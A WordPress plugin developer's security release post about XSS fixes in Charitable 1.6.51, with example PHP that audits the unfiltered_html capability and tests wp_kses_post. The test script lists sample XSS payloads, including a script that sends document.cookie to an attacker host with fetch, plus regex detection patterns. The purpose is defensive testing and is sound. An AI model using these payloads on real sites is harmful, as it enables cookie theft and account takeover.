Charitable Blog


Release Notes: Charitable 1.6.51 Fixes a Critical Security Vulnerability

Last Friday we released Charitable 1.6.51, which fixes a critical security vulnerability affecting any website using Charitable. While we are not aware of any exploits of the vulnerability, we are urging everyone to upgrade to Charitable 1.6.51 as soon as possible.

For those using Charitable Ambassadors, version 2.1.8 was released yesterday with additional security fixes, and updating is highly recommended. Charitable Recurring Donations 1.2.9, released today, also has a small fix related to form validation.

A bit of background

Last week, Charitable user Asif Minhas reached out to us about a cross-site scripting (XSS) vulnerability. This vulnerability was limited in its severity, as it could only be exploited by users with the Campaign Manager role. It has also been fixed in Charitable 1.6.51.

In the process of investigating this, we discovered a much more serious cross-site scripting vulnerability that could be exploited by anonymous (unauthenticated) visitors. The vulnerability was found on Thursday afternoon and on Friday evening we released Charitable 1.6.51.

There are a number of changes in Charitable 1.6.51 that may affect some users, which we will cover in a little more detail below.

Campaign Managers and the unfiltered_html capability

Charitable 1.6.51 removes the unfiltered_html capability from the Campaign Manager role. WordPress passes content saved by users without this capability through its wp_kses_post allow-list, so Campaign Managers will no longer be able to add certain HTML tags such as <iframe> and <embed>, inline event-handler attributes, or JavaScript code.

While there can be good reasons for Campaign Managers to have this capability, we determined that the default in Charitable should be for it to only be available to Administrators. (WordPress also grants this capability to the Editor role, but Editors are not able to create or edit campaigns, so this does not affect Charitable.)

If you would like to continue providing Campaign Managers with the unfiltered_html capability, this can be achieved by using one of the role capability editor plugins listed at https://wordpress.org/support/article/roles-and-capabilities/#plugins.

Quick aside: As mentioned above, Editors and Administrators both have the unfiltered_html capability by default. If you would like to disable it altogether, for every user including Administrators, you can do so by adding the following line to your wp-config.php file (above the line that reads "That's all, stop editing!"). On a multisite network this capability is already restricted to Super Admins regardless of what the roles say.

define( 'DISALLOW_UNFILTERED_HTML', true );
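Because WordPress stores roles and their capabilities in the database, it is worth checking what your installation actually grants rather than trusting a plugin's defaults. The following is an added example (not code from Charitable) of a must-use plugin that audits which roles carry unfiltered_html, removes it from any role not on an explicit allow-list, and lists the user accounts that can still post raw HTML. It assumes the Campaign Manager role slug is campaign_manager (confirm with `wp role list`); the EXAMPLE_ prefixed names are this example's own.

```php
<?php
/**
 * Plugin Name: Example unfiltered_html audit
 *
 * Example code, not part of Charitable. Place the file in wp-content/mu-plugins/
 * so it loads on every request. It enforces an explicit allow-list of roles that
 * may keep unfiltered_html and removes the capability from every other role.
 * Assumption: the Campaign Manager role slug is 'campaign_manager'; confirm with
 * `wp role list` before relying on this.
 */

// Roles allowed to keep unfiltered_html. These are WordPress's own defaults;
// add 'campaign_manager' only if you have decided Campaign Managers are
// trusted with raw HTML (the same effect as a role editor plugin).
const EXAMPLE_ALLOWED_ROLES = array( 'administrator', 'editor' );

/**
 * Returns the slugs of all roles that currently carry unfiltered_html.
 * Roles live in the wp_user_roles option, so a plugin upgrade that changed
 * its defaults may not have touched an existing installation.
 */
function example_roles_with_unfiltered_html() {
    $found = array();
    foreach ( wp_roles()->role_objects as $slug => $role ) {
        if ( $role->has_cap( 'unfiltered_html' ) ) {
            $found[] = $slug;
        }
    }
    return $found;
}

/**
 * Removes unfiltered_html from every role not on the allow-list and returns
 * the slugs it changed. WP_Roles::remove_cap() writes the change back to the
 * database, so after the first run this is a read-only check.
 */
function example_enforce_unfiltered_html_allowlist() {
    $removed = array();
    foreach ( example_roles_with_unfiltered_html() as $slug ) {
        if ( ! in_array( $slug, EXAMPLE_ALLOWED_ROLES, true ) ) {
            wp_roles()->remove_cap( $slug, 'unfiltered_html' );
            $removed[] = $slug;
        }
    }
    if ( $removed ) {
        error_log( 'Removed unfiltered_html from roles: ' . implode( ', ', $removed ) );
    }
    return $removed;
}

/**
 * Effective check: which user accounts can actually post raw HTML right now.
 * user_can() goes through map_meta_cap(), so DISALLOW_UNFILTERED_HTML and
 * multisite (where only Super Admins qualify) are taken into account, which a
 * plain look at the role table is not.
 */
function example_users_with_unfiltered_html() {
    $logins = array();
    foreach ( get_users( array( 'fields' => array( 'ID', 'user_login' ) ) ) as $user ) {
        if ( user_can( $user->ID, 'unfiltered_html' ) ) {
            $logins[] = $user->user_login;
        }
    }
    return $logins;
}

// Priority 20 so this runs after plugins that register or adjust roles on init.
add_action( 'init', 'example_enforce_unfiltered_html_allowlist', 20 );
```

To inspect without changing anything, call the two audit functions from WP-CLI, for example `wp eval 'print_r( example_roles_with_unfiltered_html() ); print_r( example_users_with_unfiltered_html() );'`. The role check and the per-user check answer different questions: the first tells you what is stored, the second what WordPress will enforce on the next save, including the effect of DISALLOW_UNFILTERED_HTML.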

Adding HTML to donation amount descriptions

Previously, when adding suggested donation amounts, it was possible to add HTML to the suggested donation amount descriptions. With Charitable 1.6.51, this will no longer be possible by default.

But if you really want to be able to add HTML to your suggested donation amount descriptions, you can re-enable this ability using the charitable_sanitize_suggested_amount_description filter, by simply adding the following to a custom plugin, your theme's functions.php file, or with a plugin like Code Snippets:

add_filter( 'charitable_sanitize_suggested_amount_description', '__return_false' );

Is it safe to do this? That depends on your situation. If the only people creating campaigns on your website are Administrators, then this should be fine. However, if you have Campaign Managers creating campaigns as well, or if you are using Charitable Ambassadors and campaign creators can set suggested amounts for their campaigns, be aware that this does allow those users to add HTML to their amount descriptions as well.

That said, even if you do turn off sanitization of the suggested amount descriptions, Charitable still ensures that no unsafe HTML is added, such as JavaScript code, by filtering the content using wp_kses_post. Note what that does and does not buy you: wp_kses_post strips <script> tags, inline event-handler attributes such as onerror, and javascript: URLs, but it still permits the same fairly rich markup as a blog post (links, images, formatting), so it reduces rather than removes what a campaign creator can place on your donation page.
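If you do disable the extra sanitization, it is worth confirming on your own installation that the wp_kses_post backstop behaves as described. The following is an added example (not Charitable's own code) that feeds a handful of constructed, deliberately hostile suggested-amount descriptions through wp_kses_post() and reports whether anything a browser could execute survives. It must run inside WordPress (for instance via `wp eval-file`); the example_ prefixed function and the sample strings are this example's own.

```php
<?php
/**
 * Example check, not Charitable's own code. Run inside WordPress, e.g.
 *   wp eval-file kses-check.php
 * Each constructed description is passed through wp_kses_post(), the
 * allow-list filter Charitable keeps applying even when the
 * charitable_sanitize_suggested_amount_description filter returns false,
 * and the result is scanned for script-capable constructs.
 */

// Constructed sample inputs (not real campaign data). The first two are
// legitimate; the rest are the vectors an attacker with campaign access
// would try.
$example_descriptions = array(
    'plain'   => 'Feeds one family for a week',
    'format'  => 'Feeds <strong>one family</strong> for a <em>week</em>',
    'script'  => 'Feeds one family<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>',
    'handler' => '<img src="x" onerror="alert(document.domain)">',
    'js_url'  => '<a href="javascript:alert(1)">Donate now</a>',
    'iframe'  => '<iframe src="https://attacker.invalid/"></iframe>',
    'svg'     => '<svg><script>alert(1)</script></svg>',
);

/**
 * Returns the labels of script-capable constructs still present in $html.
 * An empty array means the sanitizer left nothing a browser could execute;
 * ordinary text that used to sit inside a stripped tag is allowed to remain.
 */
function example_script_residue( $html ) {
    $patterns = array(
        'script tag'      => '/<script\b/i',
        'event handler'   => '/\son[a-z]+\s*=/i',
        'javascript: URL' => '/javascript\s*:/i',
        'embedding tag'   => '/<(iframe|embed|object|svg)\b/i',
    );
    $hits = array();
    foreach ( $patterns as $label => $regex ) {
        if ( preg_match( $regex, $html ) ) {
            $hits[] = $label;
        }
    }
    return $hits;
}

$failures = 0;
foreach ( $example_descriptions as $name => $raw ) {
    $clean   = wp_kses_post( $raw );
    $residue = example_script_residue( $clean );
    if ( $residue ) {
        $failures++;
    }
    printf(
        "%-8s raw:   %s\n         clean: %s\n         %s\n\n",
        $name,
        $raw,
        $clean,
        $residue ? 'FAIL, survived: ' . implode( ', ', $residue ) : 'ok'
    );
}

// Non-zero exit so the check can sit in a deployment pipeline.
exit( $failures > 0 ? 1 : 0 );
```

Three behaviours of wp_kses are worth recognising in the output: a disallowed tag is removed but the text between its opening and closing tags is kept (so the stripped <script> leaves its JavaScript behind as harmless text), attributes not on the allow-list for that tag are dropped, and wp_kses_bad_protocol() removes the javascript: scheme from a URL rather than rejecting the whole link. The formatting sample should come through unchanged, which is the point of allowing HTML at all.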

A final word

We’re sorry to everyone using Charitable for this security vulnerability. We’re disappointed and frankly more than a little bit embarrassed by this. We will continue to do our absolute best to make sure that Charitable is a simple, secure way for you to accept donations on your website.

Thank you to Asif Minhas, who reported the vulnerability related to Campaign Managers, and Robert Rowley from WPScan who was also in touch regarding the Campaign Managers issue.

If you have any concerns about this release or would like a hand with anything else related to Charitable, get in touch with us! We’re always happy to help.

If you have found a security vulnerability and would like to report it, please email us at [email protected].

By Eric Daams
